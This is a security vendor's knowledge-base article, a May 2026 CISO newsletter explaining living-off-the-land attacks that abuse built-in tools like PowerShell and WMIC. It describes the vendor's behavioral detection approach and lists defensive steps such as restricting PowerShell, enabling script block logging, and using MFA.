BlackCloak Knowledge Base
Protect Your Digital Life ™
In this article
From the Desk of the CISOThe Call is Coming from Inside the House: The Rise of LOTL AttacksThe Issue: Why Your Own Tools are Being Used Against YouOur Mature Defense: Beyond Visibility to Behavioral DetectionRemediation Steps: How to Protect Your Environment
Home
White Papers & Reports
From the Desk of the CISO
2026

May 2026 Cloaked in Security

Edited

From the Desk of the CISO

Issue: May 2026

The Call is Coming from Inside the House: The Rise of LOTL Attacks

Modern cyber threats have undergone a fundamental shift. It is no longer enough to simply watch for "bad files" or external malware. Today, 84% of high-severity attacks now leverage Living off the Land (LOTL) techniques.

In these scenarios, attackers don't bring their own weapons; they use the trusted tools already installed on your systems—such as PowerShell and WMIC—to move laterally and steal data. Because these tools are legitimate and necessary for daily IT operations, traditional antivirus often fails to see the threat.

The Issue: Why Your Own Tools are Being Used Against You

Attackers prefer LOTL tactics because they allow them to blend in with normal administrative activity.

  • Stealth and Persistence: By using native binaries (often called "LOLBins"), threat actors can remain undetected for years.

  • Bypassing Defenses: Traditional security tools look for signatures of known malware. Since no new files are introduced in a LOTL attack, there is no "signature" to flag.

  • Unmanaged Surface Area: Most organizations have hundreds of native tools active by default. Research shows that up to 95% of access to these risky tools is unnecessary, creating a massive, unmanaged internal attack surface.

Our Mature Defense: Beyond Visibility to Behavioral Detection

Simple visibility into your network is no longer sufficient. To combat LOTL threats, we have matured our security capabilities to focus on behavioral-based detection rather than just signature-based tools.

  • Behavioral Analytics: We establish baselines for what "normal" looks like. If a Word document suddenly spawns a PowerShell script to download a file, our systems flag it as a deviation from the norm.

  • Custom Concierge Detection: We don't just alert you to activity; we provide context. Our team interprets these complex behaviors in real-time to distinguish between a legitimate IT task and an attacker moving through your environment.

  • Internal Attack Surface Reduction: We work to identify where access to administrative tools is excessive, helping to close the pathways attackers use before they can be exploited.

Remediation Steps: How to Protect Your Environment

  1. Harden Your Settings: Ensure that high-risk tools like PowerShell are only accessible to those who strictly need them for their roles.

  2. Enable Advanced Logging: Ensure PowerShell Script Block Logging is active. This allows us to see the actual commands being run, even if they are encoded.

  3. Practice Good Hygiene: Continue using strong, unique passwords and multifactor authentication (MFA). Most LOTL attacks begin with a compromised credential that allows the attacker to log in as a "trusted" user.

  4. Stay Updated: Regularly update your operating systems and security software to patch the vulnerabilities that attackers use for their initial entry.


BlogContact UsGo to BlackCloak.io